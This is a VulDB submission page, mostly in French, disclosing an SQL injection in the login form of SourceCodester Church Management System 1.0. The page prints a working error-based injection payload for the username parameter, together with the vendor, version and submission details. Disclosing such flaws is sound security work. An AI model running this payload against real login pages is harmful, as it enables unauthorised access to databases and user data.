Soumettre #42996: Church Management System-SQL injectionsinformation

TitreChurch Management System-SQL injections
DescriptionChurch Management System-SQL injections Date: 2022-08/06 Exploit Author: [email protected] Vendor Homepage: https://www.sourcecodester.com Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html Version: 1.0 /login.php username、passwordParameters have SQL injection payload login=Login&password=admin&username=' OR (SELECT 7064 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(7064=7064,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jURL
La source⚠️ https://github.com/anx0ing/CVE_demo/blob/main/2022/Church%20Management%20System-SQL%20injections.md
Utilisateur
 anx0ing (UID 30698)
Soumission05/08/2022 20:17 (il y a 4 ans)
Modérer05/08/2022 20:50 (33 minutes later)
StatutAccepté
Entrée VulDB205668 [SourceCodester Church Management System 1.0 /login.php Nom d'utilisateur injection SQL]
Points20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!